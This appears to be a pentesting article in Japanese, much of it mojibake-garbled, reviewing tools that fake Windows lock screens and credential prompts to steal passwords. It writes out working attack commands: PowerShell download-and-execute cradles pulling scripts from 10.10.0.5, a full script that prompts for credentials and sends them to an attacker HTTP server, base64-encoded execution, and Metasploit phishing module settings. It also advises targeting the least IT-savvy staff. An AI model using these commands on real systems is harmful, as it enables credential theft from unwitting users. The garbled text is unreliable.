2020幎ã®ç¬¬1ååæã«ãäžçäžã®ãŠãŒã¶ãŒãæšçãšãããã£ãã·ã³ã°æ»æã®æ°ã¯ã2019幎ã®åææãšæ¯èŒããŠ9ïŒ ãã18ïŒ ã«åå¢ããŸããããã®ãããªããŒã¿ã¯ãKasperskyLabãã«ãã£ãŠæäŸãããŸãã
Windowsãã¡ããªã®ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã§ã¯ãäžéšã®ããã°ã©ã ããã³ããã»ã¹ããèªèšŒã®ããã«ãŠãŒã¶ãŒè³æ Œæ å ±ãèŠæ±ããŠïŒããšãã°ãOutlookã§ïŒå®è¡ç¹æš©ãææ ŒããããïŒãŠãŒã¶ãŒã¢ã«ãŠã³ãå¶åŸ¡ïŒãåã«ã¹ã¿ã³ãã€ã¢ãŒããçµäºãããïŒWindows LockScreenïŒããã®ãæ®éã§ãããã®Windowsã®åäœãæš¡å£ãããšãåŸã§äŸµå ¥ãã¹ãã§äœ¿çšããããã«ãŠãŒã¶ãŒè³æ Œæ å ±ãååŸã§ããŸãããã®èšäºã§ã¯ãããã¯ç»é¢ãå€æŽããããã®ããã€ãã®äžè¬çãªãã£ãã·ã³ã°ããã°ã©ã ã®ãã€ãžã§ã¹ãããŸãšããŸããã
ããïŒ
ææ°ã®äŸµå ¥ãã¹ãæ¹æ³ã¯ãããŸããŸãªãã¬ãŒã ã¯ãŒã¯ïŒCobalt StrikeãCovenantãªã©ïŒãä»ããŠå®è¡ã§ãããããCïŒããã°ã©ãã³ã°èšèªã«åºã¥ããŠããããšããããã
ãŸãã1ïŒFakeLogonScreenãŠãŒãã£ãªãã£ã¯CïŒã®Arris Huijgenã«ãã£ãŠéçºãããæšæºã®OSãã¹ã¯ãŒãå ¥åç»é¢ã«çœ®ãæããã ãã§ã¯ãããŸããããŸããã·ã¹ãã ã«èšå®ãããŠããæšæºç»é¢ã®ãã©ã¡ãŒã¿ã䜿çšããŠãããå®è¡ããŸããããã«ããããŠãŒã¶ãŒã«ç念ãæ±ãããããã°ã€ã³è³æ Œæ å ±ãæ£åžžã«ååŸã§ããå¯èœæ§ãå€§å¹ ã«é«ãŸããŸãã
FakeLogonScreen-FakeLogonScreenãèµ·åã
ãŸã-ç»é¢ãããã¯ããŸã
åœã®ãã°ã€ã³ããŒãžã§ãã¹ã¯ãŒããå ¥åãããšãFakeLogonScreenã¯ADãŸãã¯ããŒã«ã«ã§è³æ Œæ å ±ãæ€èšŒããŠããã¹ã¯ãŒããæ£ããå ¥åããããã©ãããæ£ç¢ºã«å€æããŸããå°æ¥çã«ã¯ããã¹ã¯ãŒãã¯ãã³ãã¹ã¿ãŒã³ã³ãœãŒã«ã«è¡šç€ºãããŸãã
FakeLogonScreen-è³æ Œæ å ±ã®å ¥å
FakeLogonScreenã«ã¯ããã£ããã£ãããè³æ Œæ å ±ãææãããã·ã³ã®ããŒã«ã«ã®user.dbãã¡ã€ã«ã«ä¿åããå®è¡å¯èœãã¡ã€ã«ã®2çªç®ã®ããŒãžã§ã³ãå«ãŸããŠããŸãããã®ãã¡ã€ã«ã¯ãtypeã³ãã³ãã䜿çšããŠè¡šç€ºã§ããŸãã
type C:\Users\testTHUser3\AppData\Local\Microsoft\user.db
FakeLogonScreen-user.dbãã¡ã€ã«ã«ä¿å
2ïŒMatt Pickfordã«ãã£ãŠéçºãããSharpLockerããã°ã©ã ã¯ãåæ§ã«æ©èœããŸããèµ·åãããšãå ã®ãã°ã€ã³ç»é¢ã眮ãæããããŸããSharpLocker-ç»é¢ãã㯠ãŠãŒã¶ãŒãå ¥åããåæåã¯ããã¹ã¯ãŒãå šäœãæããã«ãªããŸã§ååãããŸãããã ãããã®ãŠãŒãã£ãªãã£ã¯ãã¹ã¯ãŒããèªèšŒããããŠãŒã¶ãŒããã¹ã¯ãŒããã£ãŒã«ãã«å ¥åããå 容ãã¹ãããã£ã³ã°ããããšã«æ³šæããŠãã ãããSharpLocker-ãã¹ã¯ãŒããã£ãã·ã³ã°
ãã¯ãŒã·ã§ã«
äŒæ¥ç°å¢ã®ãœãããŠã§ã¢ã§ã¯å®æçã«è¿œå ã®ç¢ºèªãŸãã¯åæ¿èªãå¿ èŠã«ãªãå ŽåããããããWindowsã»ãã¥ãªãã£ã«ããè³æ Œæ å ±ã®ããã³ããã¯éåžžã«äžè¬çã§ããããšãã°ãMicrosoft Outlookã¯ããã®ãããªãœãããŠã§ã¢ã®æãåªãã代衚ã®1ã€ã§ãããåžžã«ãŠãŒã¶ãŒã«ãã¡ã€ã³è³æ Œæ å ±ã®å ¥åãæ±ããŸãã1.Windows
ã»ãã¥ãªãã£ã¯ãšãªãŠã£ã³ããŠãè£ ã£ããŠãŒãã£ãªãã£ã¯CredsLeakerãšåŒã°ããŸããæ£ããåäœãããã«ã¯ãå¿ èŠãªãã¹ãŠã®ãã¡ã€ã«ãåä¿¡ãããŠãŒã¶ãŒè³æ Œæ å ±ãæ ŒçŽããWebãµãŒããŒãšããµãŒããŒã«HTTPèŠæ±ãéä¿¡ããPowerShellã®ååšãå¿ èŠã§ããå°æ¥çã«ã¯ããã¹ãŠã®ã³ãã³ãã¯ã³ã³ããžã·ã§ã³ã«å«ãŸããBATãã¡ã€ã«ããå®è¡ãããäºå®ã§ãã
CredsLeaker-HTTPé ä¿¡
run.batãã¡ã€ã«ãå®è¡ããåã«ããŠãŒãã£ãªãã£ã®æ§æãã¡ã€ã«ã«å¿ èŠãªãã¹ãŠã®å€æŽãå ããå¿ èŠããããŸãã run.batãã¡ã€ã«ãèµ·åããããšããŠãŒã¶ãŒã¯èªåã®è³æ Œæ å ±ãèŠæ±ããWindowsã»ãã¥ãªãã£ãŠã£ã³ããŠã衚瀺ããŸãã
CredsLeaker-ãã£ãã·ã³ã°
ãŠã£ã³ããŠæå¹ãªãŠãŒã¶ãŒè³æ Œæ å ±ãå ¥åãããå Žåã«ã®ã¿ãããã³ãããŠã£ã³ããŠãæ¶ããŸãããã¡ã€ã³ãã³ã³ãã¥ãŒã¿ãŒåããŠãŒã¶ãŒåãããã³ãã¹ã¯ãŒãã¯ã以äžã®ãã¹ã®creds.txtãã¡ã€ã«ã«ä¿åãããŸãã
/var/www/html/creds.txt
CredsLeaker -ãã¡ã€ã«creds.txtã«åºå
2.ãããã»ãã«ãœã³ããPowerShellã®éçºã¹ã¯ãªããWindowsã»ãã¥ãªãã£è³æ Œæ å ±ããã³ãããèµ·åãããããæ€èšŒããŸããæå¹ãªè³æ Œæ å ±ãå ¥åããããŸã§ããã®ãŠã£ã³ããŠããŠãŒã¶ãŒãéããããšãã§ããŸããããã®ã¹ã¯ãªããã¯ãªã¢ãŒãã§å®è¡ã§ããå ¥åãããè³æ Œæ å ±ã¯æ»æè ã®ãã·ã³ã®ã³ã³ãœãŒã«ã«è¡šç€ºãããŸãã
powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.10.0.5/Invoke-LoginPrompt.ps1')); Invoke-LoginPrompt
Invoke-LoginPrompt-ãªã¢ãŒãåŒã³åºã
Invoke-LoginPrompt-ãã£ãã·ã³ã°ãŠã£ã³ããŠ3.Nishangãã¬ãŒã ã¯ãŒã¯ã®
äžéšãšããŠããŠãŒã¶ãŒè³æ Œæ å ±ãèŠæ±ããããã®åœã®ãŠã£ã³ããŠãäœæããPowerShellã¹ã¯ãªããããããŸãã
Import-Module C:\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish
Invoke-CredentialsPhish-ããŒã«ã«ãã£ã¬ã³ãžããã³ãã£ãã·ã³ã°ãŠã£ã³ããŠ
çæããããŠã£ã³ããŠã¯ããã®ã¢ã¯ã·ã§ã³ãè³æ Œæ å ±ã®åœ¢åŒã§ç¢ºèªãå¿ èŠãšããããšãéç¥ããŸããæ å ±ã»ãã¥ãªãã£ã®é¢ã§çµéšè±å¯ãªãŠãŒã¶ãŒã¯ããã®ãŠã£ã³ããŠãããã¯ã°ã©ãŠã³ãã§ã®ã¢ããªã±ãŒã·ã§ã³ã®èµ·åã«ãã£ãŠåŒãèµ·ããããŠãããšçããããããŸããããäŒæ¥ãããã¯ãŒã¯ã®ãã¹ãŠã®äººããã®ç¥èãæã£ãŠããããã§ã¯ãããŸããããŠãŒã¶ãŒããã€ã¢ãã°ã«å ¥åããè³æ Œæ å ±ãã³ã³ãœãŒã«ã«è¡šç€ºãããŸãã
Invoke-CredentialsPhish-åéãããããŒã¿ã®åºå
ãã®ã¹ã¯ãªããã¯ããªã¢ãŒãã§å®è¡ããããšãã§ããŸãã
powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.10.0.5/Invoke-CredentialsPhish.ps1)); Invoke-CredentialsPhish
Rob Fullerã¯åœŒã®ããã°ã§ãMetasploitãšPowerShellã䜿çšããŠãŠãŒã¶ãŒãè³æ Œæ å ±ããã£ãã·ã³ã°ããæ»æã«ã€ããŠèª¬æããŸãããMetasploit Frameworkã«ã¯ãããŸããŸãªãããã³ã«ïŒFTPãSMBãHTTPãªã©ïŒãããŠãŒã¶ãŒè³æ Œæ å ±ãååŸã§ããã¢ãžã¥ãŒã«ãå«ãŸããŠããŸãã次ã®ã¢ãžã¥ãŒã«ã¯ãèªèšŒã䜿çšããŠåºæ¬çãªHTTPãµãŒããŒãå±éããããã«äœ¿çšãããŸãã
use auxiliary/server/capture/http_basic
set URIPATH /
PowerShellã¯ãWindowsã»ãã¥ãªãã£ããã³ãããŠã£ã³ããŠãçæããåéããè³æ Œæ å ±ãMetasploitãä»ããŠä»¥åã«äœæããHTTPãµãŒããŒã«éä¿¡ããããšã«ããããŠãŒã¶ãŒè³æ Œæ å ±ã«å¯ŸããŠãã£ãã·ã³ã°æ»æãå®è¡ããããã«äœ¿çšãããŸãã
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('http://10.10.0.5/');
æåã«è³æ Œæ å ±ãååŸããã«ã¯ãUTF-16LEãšã³ã³ãŒãã£ã³ã°ã䜿çšããŠããBase64ã«å€æããå¿ èŠããããŸãã
cat popup.txt | iconv -t UTF-16LE
cat popup.txt | iconv -t UTF-16LE | base64 -w0
ã³ãŒããBase64ã«å€æãã
æå®ãããã³ãŒããããŒã«ã«ãŸãã¯ãªã¢ãŒãã§å®è¡ãããšããŠãŒã¶ãŒã¯Windowsã»ãã¥ãªãã£ããã®èš±å¯ãæ±ããããŸãã
powershell.exe -ep bypass -enc <base64>
ãã£ãã·ã³ã°è³æ Œæ å ±ãŠã£ã³ããŠ
Metasploitã¢ãžã¥ãŒã«ã¯ããŠãŒã¶ãŒãå ¥åãããšããã«è³æ Œæ å ±ãåãåããŸãã
MetasploitHTTPãµãŒããŒ-è³æ Œæ å ±ã®ååŸ
Metasploit
Metasploit Frameworkã«ã¯ãã·ã¹ãã å ã®ã»ãŒãã¹ãŠã®ããã»ã¹ããWindowsã»ãã¥ãªãã£èªèšŒãèŠæ±ããåœã®ãŠã£ã³ããŠãåå¥ã«ããªã¬ãŒã§ããã¢ãžã¥ãŒã«ãå«ãŸããŠããŸãããã®ã¢ãžã¥ãŒã«ãæ£ããæ©èœããããã«ã¯ãåäœããmeterpreterã»ãã·ã§ã³ãšãåœã®Windowsã»ãã¥ãªãã£èªèšŒèŠæ±ãåŒã³åºãããããã»ã¹ãæå®ããå¿ èŠããããŸãã
use post/windows/gather/phish_windows_credentials
set SESSION 3
set PROCESS *
run
Metasploitã¢ãžã¥ãŒã«-æ§æ
ãã®å Žåã*èšå·ã¯ãã·ã¹ãã ïŒNT Authority \ SystemïŒã«ä»£ãã£ãŠå®è¡ãããŠãããã¹ãŠã®ããã»ã¹ãç£èŠããã·ã¹ãã ã«ä»£ãã£ãŠã·ã¹ãã ã§æ°ããããã»ã¹ãèµ·åããããšãã«ãã€ã¢ãã°ããã¯ã¹ãåŒã³åºãããã«ã¢ãžã¥ãŒã«ã«æ瀺ããŸãã
Metasploitã¢ãžã¥ãŒã«-ãã¹ãŠã®ããã»ã¹ã®ç£èŠ
æ°ããããã»ã¹ãéå§ããããšããã«ããŠãŒã¶ãŒã«ã¯ããã®ããã»ã¹ã«ä»£ãã£ãŠããããªãäœæ¥ã確èªããããã®æ¿èªèŠæ±ãå«ããã€ã¢ãã°ããã¯ã¹ã衚瀺ãããŸãã
Metasploitã¢ãžã¥ãŒã«-ãã£ãã·ã³ã°ãŠã£ã³ããŠ
ãŠãŒã¶ãŒãè³æ Œæ å ±ãå ¥åãããšããã«ããããã¯Metasploitã³ã³ãœãŒã«ã«è¡šç€ºãããŸãã
Metasploitã¢ãžã¥ãŒã«-è³æ Œæ å ±ã®ååŸ
ãŸãããã®ã¢ãžã¥ãŒã«ã¯ãç¹å®ã®ããã»ã¹ã®éå§ãåŸ æ©ããããã«æ§æã§ããŸãã
Metasploitã¢ãžã¥ãŒã«-notepad.exeããã»ã¹ãä»ããŠè³æ Œæ å ±ãååŸãã
ããã·ã¥
Lockphishã¯ãWindowsã®ãã°ã€ã³ãŠã£ã³ããŠãåœè£ ãããã£ãã·ã³ã°æ»æãå®è¡ã§ãããã1ã€ã®ãŠãŒãã£ãªãã£ã§ãããã°ã€ã³ãŠã£ã³ããŠãã³ãã¬ãŒãã¯PHPãµãŒããŒã«ä¿åãããããã©ã«ãã§ã¯ããŠãŒã¶ãŒåãšãã¹ã¯ãŒããå ¥åããåŸãYouTubeã䜿çšããŠãŠãŒã¶ãŒããªãã€ã¬ã¯ãããŸãã
bash lockphish.sh
LockPhish-èµ·å
ãã®æç¹ã§ããœãŒã·ã£ã«ãšã³ãžãã¢ãªã³ã°ã䜿çšããŠãããã¯ç»é¢ãã¡ã€ã«ãé 眮ãããŠããWebãµã€ãã«ãŠãŒã¶ãŒãèªå°ããå¿ èŠããããŸãã
LockPhish-ãã¡ã€ã«ã®ããŠã³ããŒã
ä»ã®ãã¹ãŠã®ãŠãŒãã£ãªãã£ãšã¯ç°ãªãããã®ããã¯ç»é¢ã®èŠçŽ ã®é 眮ã¯æ£ç¢ºã§ãªãå Žåããããæ¿èªãªã¯ãšã¹ãã¯çŸåšã®ãŠãŒã¶ãŒã¢ã«ãŠã³ãã§ã¯ãªã管çè ã«ä»£ãã£ãŠè¡šç€ºãããããã¯ãŠã£ã³ããŠã¯å€éšçã«Windows 10LockscreenãšããŠã¹ã¿ã€ã«èšå®ãããŸããããããã¹ãŠãçµã¿åãããããšã§ããŠãŒã¶ãŒã«å€§ããªèŠåãäžããããšãã§ããŸãããã®ãŠãŒãã£ãªãã£ã«ã¯ãå ¥åãããã¹ã¯ãŒããæ€èšŒããã¡ã«ããºã ããããŸããã
LockPhish-ããã¯ç»é¢
ãŠãŒã¶ãŒãè³æ Œæ å ±ãå ¥åãããšãyoutube.comWebãµã€ããžã®ãªãã€ã¬ã¯ããå®è¡ãããŸãã
LockPhish-ãªãã€ã¬ã¯ã
è³æ Œæ å ±ãã³ã³ãœãŒã«ã«è¡šç€ºãããŸãã
LockPhish-åéãããè³æ Œæ å ±
ãã®èšäºã§çŽ¹ä»ããæ¹æ³ã¯ããã³ãã¹ã¿ãŒããã§ã«ã·ã¹ãã ã«è¶³å Žãç¯ããïŒå®å®ãããšã³ããªãã€ã³ããååŸããïŒå Žåã«å¹æçã§ãããç¹æš©ãææ Œããããå¥ã®æ¹æ³ã§ãŠãŒã¶ãŒè³æ Œæ å ±ãååŸãããããããšã¯ã§ããŸããããã®ãããªãã£ãã·ã³ã°æ»æãè¡ããšãã¯ãã¿ãŒã²ãããªãŒãã£ãšã³ã¹ãæ éã«éžæããå¿ èŠããããŸããã¿ãŒã²ãããçµç¹ã®ITç¥èãæãå°ãªãåŸæ¥å¡ã§ããå Žåãå¹æã¯äœåãé«ããªããŸãã
é»å ±ã«é¢ããç§ãã¡ã®ããã°ã«ã¯ããã«å€ãã®è³æããããŸããç³ã蟌ãïŒãã¹ãããããã¹ãŠã®ãœãããŠã§ã¢ã®ç°¡åãªè©æ±º
- FakeLogonScreenãã·ã¹ãã ã«èšå®ãããæšæºãã©ã¡ãŒã¿ã䜿çšããªãããå¯èœãªéã劥åœã«èŠããŸããå ¥åãããè³æ Œæ å ±ã®æ€èšŒãå®è¡ããæ¹æ³ãç¥ã£ãŠããŸããïŒæåã®éžæïŒ
- SharpLocker. , windows LockScreen, , . ( , FakeLogonScreen)
- CredsLeaker. , , - . , - â , ââ , - â , , . ( )
- Invoke-LoginPrompt. , , Windows. . ( , )
- Invoke-CredentialsPhish. , .
- Rob Fuller. metasploit, , . ( )
- Metasploit phish_windows_credentials. Metasploit ( ), . ( , IT- )
- LockPhishãäžæ¹ã§ã¯ãèªèšŒãªãã§ãããã«ã¯çŸåšã®ãŠãŒã¶ãŒãèæ ®ããã«ãæ²ããããã£ãŠã¬ã€ã¢ãŠããããããã¯ç»é¢ïŒåžžã«ç®¡çè ã«ãã¹ã¯ãŒããèŠæ±ããŸãïŒãäžæ¹ããã©ãŠã¶ãä»ããŠããªã¬ãŒã§ããã®ã¯ãã®æ£è ã ãã§ãããªã³ã¯ã被害è ã«éä¿¡ããŠåŸ ã¡ãŸããïŒç®±ããåºããŠäœ¿çšããããšã¯ãå§ãããŸããããç¹å®ã®è¢«å®³è ã®ãŠãŒã¶ãŒåãããã£ãŠããå Žåã¯ã管çè ãããã®ãŠãŒã¶ãŒåã«åæ§æããã°ãããã»ã©æªãã¯ãããŸãããæ©èœããå ŽåããããŸãïŒ